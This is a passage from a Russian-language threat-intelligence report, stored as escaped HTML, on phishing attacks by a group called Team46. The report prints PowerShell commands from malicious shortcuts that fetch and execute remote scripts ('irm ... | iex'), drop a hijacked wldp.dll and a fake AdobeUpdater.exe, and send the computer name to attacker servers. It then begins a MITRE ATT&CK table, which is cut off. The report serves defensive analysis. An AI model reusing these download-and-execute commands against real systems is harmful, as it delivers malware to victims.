data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/dec\/76f\/dc8\/dec76fdc82c97a1e252aaac80d89dab2.png\"\/><\/figure>\n<p>\u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442 \u0441\u043e\u0437\u0434\u0430\u043d 26.02.2024 \u0432 12:00:07 UTC+00:00 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 Microsoft: Print To PDF \u0441 \u0438\u043c\u0435\u043d\u0435\u043c Remote Desktop Redirected Printer Doc, \u0447\u0442\u043e \u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0443 \u043f\u043e \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0443 RDP, \u043f\u043e\u0441\u043b\u0435 \u0447\u0435\u0433\u043e \u0432\u044b\u0432\u0435\u043b\u0438 \u0435\u0433\u043e \u043d\u0430 \u043f\u0435\u0447\u0430\u0442\u044c \u0432 \u0444\u043e\u0440\u043c\u0430\u0442\u0435 PDF. \u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0434\u043e\u043c\u0435\u043d\u0430 <code>srv480138.hstgr.cloud<\/code> \u044f\u0432\u043b\u044f\u043b\u043e\u0441\u044c \u043f\u043e\u043b\u043d\u043e\u0439 \u043a\u043e\u043f\u0438\u0435\u0439 \u0441\u0430\u0439\u0442\u0430 <code>elevation.store<\/code> \u2014 \u0431\u044c\u044e\u0442\u0438-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0430 \u0432 \u041e\u0410\u042d. \u0417\u0430\u0433\u043b\u0443\u0448\u043a\u0430 \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u043d\u043e \u043d\u0435 \u0441\u043e\u043e\u0442\u043d\u043e\u0441\u0438\u043b\u0430\u0441\u044c \u0441 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u043c-\u043f\u0440\u0438\u043c\u0430\u043d\u043a\u043e\u0439, \u043d\u043e \u044d\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u044d\u0442\u043e\u0442 \u0441\u0435\u0440\u0432\u0435\u0440 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u043b\u0438 \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u0432 \u041e\u0410\u042d, \u043d\u043e \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0438\u0439 \u043d\u0435 \u043d\u0430\u0448\u043b\u043e\u0441\u044c.<\/p>\n<h2>\u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0430\u0442\u0430\u043a<\/h2>\n<p>\u0412 \u043f\u0435\u0440\u0432\u043e\u0439 \u0430\u0442\u0430\u043a\u0435 \u044f\u0440\u043b\u044b\u043a \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 powershell.exe \u0441\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439:<\/p>\n<p><code>-w Minimized -ep Bypass -nop -c \"irm https:\/\/infosecteam.info\/other.php?id=jdcz7vyqdoadr31gejeivo6g30cx7kgu | iex\"<\/code><\/p>\n<p>\u041a\u0430\u0436\u0434\u043e\u043c\u0443 \u0430\u0434\u0440\u0435\u0441\u0430\u0442\u0443 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u044f\u0440\u043b\u044b\u043a \u0441 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u043c \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u043c. \u042f\u0440\u043b\u044b\u043a \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u0442 \u0438 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0441\u043a\u0440\u0438\u043f\u0442 \u0441\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u0435\u043c:<\/p>\n<p><code>C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -w Minimized -ep Bypass -nop -c \"iwr 'http:\/\/infosecteam.info\/Job%20application.pdf' -OutFile $env:LOCALAPPDATA\\Temp\\102fa066-cc9d-4a80-b3aa-12d5df196b42.pdf -UserAgent 'Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/121.0.0.0 Safari\/537.36 Edg\/121.0.0.';$env:LOCALAPPDATA\\Temp\\102fa066-cc9d-4a80-b3aa-12d5df196b42.pdf; iwr 'http:\/\/infosecteam.info\/base.php' -OutFile $env:LOCALAPPDATA\\Yandex\\YandexBrowser\\Application\\Wldp.dll -UserAgent 'Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/121.0.0.0 Safari\/537.36 Edg\/121.0.0.';\"<\/code> <\/p>\n<p>\u0421\u043a\u0440\u0438\u043f\u0442 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442-\u043f\u0440\u0438\u043c\u0430\u043d\u043a\u0443 \u0438 \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u0435\u0433\u043e, \u0430 \u0437\u0430\u0442\u0435\u043c \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0442\u0435\u0445\u043d\u0438\u043a\u0443 DLL Hijacking, \u043f\u043e\u0434\u043c\u0435\u043d\u044f\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u0443\u044e \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443 <code>wldp.dll<\/code> \u0434\u043b\u044f \u042f\u043d\u0434\u0435\u043a\u0441 \u0411\u0440\u0430\u0443\u0437\u0435\u0440\u0430. \u0412 \u0441\u043a\u0440\u0438\u043f\u0442\u0435 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 User-Agent \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0441\u0442\u0440\u043e\u043a\u0430, \u043e\u0442\u043d\u043e\u0441\u044f\u0449\u0430\u044f\u0441\u044f \u043a \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0443 Microsoft Edge \u0432\u0435\u0440\u0441\u0438\u0438 121, \u0432\u044b\u0448\u0435\u0434\u0448\u0435\u0439 25 \u044f\u043d\u0432\u0430\u0440\u044f 2024 \u0433\u043e\u0434\u0430.<\/p>\n<p>\u042f\u0440\u043b\u044b\u043a \u0438\u0437 \u0432\u0442\u043e\u0440\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 powershell.exe \u0441 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u043e\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439:<\/p>\n<p><code>-w Minimized -ep Bypass -nop -c \"irm https:\/\/srv480138.hstgr.cloud\/warning.php?id=efu8crth52xe73hku1whp10h7i2unsnw | iex\"<\/code><\/p>\n<p>\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u0442\u0430\u043a\u0436\u0435 \u0443\u043d\u0438\u043a\u0430\u043b\u0435\u043d \u0434\u043b\u044f \u043a\u0430\u0436\u0434\u043e\u0439 \u0446\u0435\u043b\u0438. \u042f\u0440\u043b\u044b\u043a \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u0442 \u0438 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0441\u043a\u0440\u0438\u043f\u0442:<\/p>\n<p><code>C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -w Minimized -ep Bypass -nop -c \"iwr 'https:\/\/srv480138.hstgr.cloud\/uploads\/scan_3824.pdf' -OutFile $env:LOCALAPPDATA\\Temp\\399ha122-tt9d-6f14-s9li-lqw7di42c792.pdf -UserAgent 'Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/120.0.0.0 Safari\/537.36 Edg\/120.0.0.';$env:LOCALAPPDATA\\Temp\\399ha122-tt9d-6f14-s9li-lqw7di42c792.pdf;iwr 'https:\/\/srv480138.hstgr.cloud\/report.php?query=$env:COMPUTERNAME' -OutFile $env:LOCALAPPDATA\\Temp\\AdobeUpdater.exe -UserAgent 'Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/118.0.0.1 YaBrowser\/23.11.0.0 Safari\/537.36';$env:LOCALAPPDATA\\Temp\\AdobeUpdater.exe;\"<\/code><\/p>\n<p>\u0412 \u044d\u0442\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043f\u043e\u0434 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 Adobe Reader. \u0417\u0434\u0435\u0441\u044c \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 User-Agent \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0441\u0442\u0440\u043e\u043a\u0430, \u043e\u0442\u043d\u043e\u0441\u044f\u0449\u0430\u044f\u0441\u044f \u0443\u0436\u0435 \u043a \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0443 Microsoft Edge \u0432\u0435\u0440\u0441\u0438\u0438 120, \u0432\u044b\u0448\u0435\u0434\u0448\u0435\u0439 7 \u0434\u0435\u043a\u0430\u0431\u0440\u044f 2023 \u0433\u043e\u0434\u0430, \u0445\u043e\u0442\u044f \u044d\u0442\u0430 \u0430\u0442\u0430\u043a\u0430 \u0431\u044b\u043b\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u0435\u0434\u0435\u043d\u0430 \u043f\u043e\u0437\u0436\u0435. \u0412\u0441\u0435 \u044f\u0440\u043b\u044b\u043a\u0438 \u0441\u043e\u0437\u0434\u0430\u043d\u044b \u0438 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u044b 15.11.2023 \u0432 11:12:27 UTC. \u041d\u043e \u0432 \u043f\u0435\u0440\u0432\u043e\u0439 \u0430\u0442\u0430\u043a\u0435 \u0438\u043c\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u2014 <code>desktop-420!69j<\/code>, \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u2014 <code>Putin[REDACTED]<\/code>, \u0430 \u0432\u043e \u0432\u0442\u043e\u0440\u043e\u0439 \u0438\u043c\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u2014 <code>desktop-819jaxj<\/code>, \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u2014 IgornWay. \u0412\u0442\u043e\u0440\u043e\u0435 \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043a\u0430\u043a \u0437\u0430\u043c\u0435\u043d\u0430 \u0431\u0443\u043a\u0432 \u0432 \u043f\u0435\u0440\u0432\u043e\u043c \u043f\u0440\u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u0438 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430. \u0422\u0430\u043a\u0438\u0435 \u0440\u0430\u0437\u043b\u0438\u0447\u0438\u044f \u0432 \u043c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0445 \u0438 \u0441\u0442\u0440\u043e\u043a\u0435 User-Agent \u043c\u043e\u0433\u0443\u0442 \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0437\u0430 \u0430\u0442\u0430\u043a\u0430\u043c\u0438 \u0441\u0442\u043e\u0438\u0442 \u043d\u0435 \u043e\u0434\u0438\u043d \u0447\u0435\u043b\u043e\u0432\u0435\u043a, \u0430 \u0433\u0440\u0443\u043f\u043f\u0430 \u043b\u044e\u0434\u0435\u0439.<\/p>\n<h2>\u0417\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435<\/h2>\n<p>\u0414\u043b\u044f \u043e\u0434\u043d\u043e\u0437\u043d\u0430\u0447\u043d\u043e\u0439 \u0430\u0442\u0440\u0438\u0431\u0443\u0446\u0438\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0438\u0445 \u0438\u0441\u0442\u0438\u043d\u043d\u044b\u0445 \u043c\u043e\u0442\u0438\u0432\u043e\u0432 \u0432\u0441\u0435 \u0435\u0449\u0435 \u043d\u0435 \u0445\u0432\u0430\u0442\u0430\u0435\u0442 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0430. \u041e\u0434\u043d\u0430\u043a\u043e, \u0441\u0443\u0434\u044f \u043f\u043e \u0443\u0440\u043e\u0432\u043d\u044e \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043a\u0438 \u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u044b\u043b\u0438 \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d\u044b \u0445\u0430\u043a\u0435\u0440\u0430\u043c\u0438, \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u0430\u0437\u0430\u0442\u044c, \u0447\u0442\u043e \u043c\u044b \u0438\u043c\u0435\u0435\u043c \u0434\u0435\u043b\u043e \u0441 \u0410\u0420\u0422-\u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u043e\u0439.<\/p>\n<p>\u041c\u044b \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 Team46 \u0438 \u0436\u0434\u0435\u043c \u043e\u0442 \u043d\u0435\u0435 \u043d\u043e\u0432\u044b\u0445 \u0430\u0442\u0430\u043a.<\/p>\n<h2>TTP \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 Team46 \u043f\u043e \u043c\u0430\u0442\u0440\u0438\u0446\u0435 MITRE ATT&amp;CK<\/h2>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"center\"><strong>ID<\/strong><\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"center\"><strong>\u0418\u043c\u044f<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"center\"><strong>\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"3\" data-colwidth=\"230,230,0\" width=\"230\">\n<p align=\"center\"><strong>Reconnaissance<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1589.002<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Gather Victim Identity Information: Email Addresses    <\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u0440\u0430\u0441\u0441\u044b\u043b\u0430\u043b\u0430 \u0442\u0430\u0440\u0433\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u043f\u043e \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u043c \u0430\u0434\u0440\u0435\u0441\u0430\u043c \u0438\u0437 \u0443\u0442\u0435\u0447\u0435\u043a    <\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"3\" data-colwidth=\"230,230,0\" width=\"230\">\n<p align=\"center\"><strong>Resource Development<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1583.001<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Acquire Infrastructure:\u00a0Domains <\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u043e\u043c\u0435\u043d\u043d\u044b\u0445 \u0438\u043c\u0435\u043d \u0434\u043b\u044f \u043f\u0440\u0438\u0434\u0430\u043d\u0438\u044f \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u043e\u0433\u043e \u0432\u0438\u0434\u0430 \u0441\u0441\u044b\u043b\u043a\u0430\u043c \u0447\u0435\u0440\u0435\u0437 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 Namecheap<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1583.003<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Acquire Infrastructure:\u00a0Virtual Private Server<\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u043f\u0440\u0438\u043e\u0431\u0440\u0435\u043b\u0430 VPS \u0443 \u0441\u0435\u0440\u0432\u0438\u0441\u0430 Hostinger \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d \u043d\u0430 hstgr.cloud<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1583.004<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Acquire Infrastructure: Server    <\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u0445\u043e\u0441\u0442\u0438\u043b\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u044b \u043d\u0430 \u0441\u0435\u0440\u0432\u0438\u0441\u0435 Namecheap<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1585.002<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Establish Accounts:\u00a0Email Accounts <\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 \u0434\u043b\u044f \u043f\u0440\u0438\u0434\u0430\u043d\u0438\u044f \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u043e\u0433\u043e \u0432\u0438\u0434\u0430 \u043f\u0438\u0441\u044c\u043c\u0430\u043c \u0430\u0434\u0440\u0435\u0441 <code>jobs@rabotnik.today<\/code>, \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 \u043e\u0434\u043d\u043e\u043c \u0438\u0437 \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0434\u043e\u043c\u0435\u043d\u043e\u0432    <\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1608.005<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Stage Capabilities: Link Target    <\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0434\u043b\u044f \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u0430\u0440\u0445\u0438\u0432\u043e\u0432 \u0441 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c\u0438 \u044f\u0440\u043b\u044b\u043a\u0430\u043c\u0438<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"3\" data-colwidth=\"230,230,0\" width=\"230\">\n<p align=\"center\"><strong>Initial Access<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1566.001<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Phishing: Spearphishing Attachment<\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u0440\u0430\u0441\u0441\u044b\u043b\u0430\u043b\u0430 \u0442\u0430\u0440\u0433\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u0441 \u0432\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u043c RAR-\u0430\u0440\u0445\u0438\u0432\u043e\u043c, \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u044b\u043c \u043f\u0430\u0440\u043e\u043b\u0435\u043c \u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0432\u0448\u0438\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u044f\u0440\u043b\u044b\u043a, \u0447\u0442\u043e\u0431\u044b \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0448\u043b\u044e\u0437\u043e\u043c \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1566.002<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Phishing:\u00a0Spearphishing Link<\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u0432 \u0442\u0430\u0440\u0433\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0445 \u043f\u0438\u0441\u044c\u043c\u0430\u0445 \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 \u0441\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 RAR-\u0430\u0440\u0445\u0438\u0432 \u0431\u0435\u0437 \u043f\u0430\u0440\u043e\u043b\u044f, \u043d\u043e \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0432\u0448\u0438\u0439 \u0442\u043e\u0442 \u0436\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u044f\u0440\u043b\u044b\u043a<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"3\" data-colwidth=\"230,230,0\" width=\"230\">\n<p align=\"center\"><strong>Execution<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1059.001<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Command and Scripting Interpreter: PowerShell <\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 PowerShell-\u0441\u043a\u0440\u0438\u043f\u0442\u044b \u0434\u043b\u044f \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043d\u0438\u044f \u043f\u0440\u043e\u043c\u0435\u0436\u0443\u0442\u043e\u0447\u043d\u044b\u0445 \u0441\u0442\u0430\u0434\u0438\u0439 \u0438 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438    <\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1204.001<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">User Execution: Malicious Link    <\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u0432\u044b\u043d\u0443\u0434\u0438\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0441\u043a\u0430\u0447\u0430\u0442\u044c \u0430\u0440\u0445\u0438\u0432 \u0441 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u044f\u0440\u043b\u044b\u043a\u043e\u043c \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435, \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0447\u0435\u0440\u0435\u0437 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u043e\u0435 \u043f\u0438\u0441\u044c\u043c\u043e <\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1204.002<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">User Execution: Malicious File    <\/p>\n<\/td>\n<td>\n<p align=\"left\">Team46 \u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u0432\u044b\u043d\u0443\u0434\u0438\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043e\u0442\u043a\u0440\u044b\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u044f\u0440\u043b\u044b\u043a, \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u0447\u0435\u0440\u0435\u0437 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u043e\u0435 \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u0435<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"3\" data-colwidth=\"230,230,0\" width=\"230\">\n<p align=\"center\"><strong>Persistence<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">T1574.001<\/p>\n<\/td>\n<td data-colwidth=\"230\" width=\"230\">\n<p align=\"left\">Hijack Execution Flow: DLL Search Order Hijacking<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0414\u043b\u044f \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Team46 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 \u043f\u043e\u0434\u043c\u0435\u043d\u0443 wldp.dll \u0432 \u043f\u0430\u043f\u043a\u0435 \u0441 \u042f\u043d\u0434\u0435\u043a\u0441 \u0411\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u043c<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"3\" data-colwidth=\"230,230,0\" 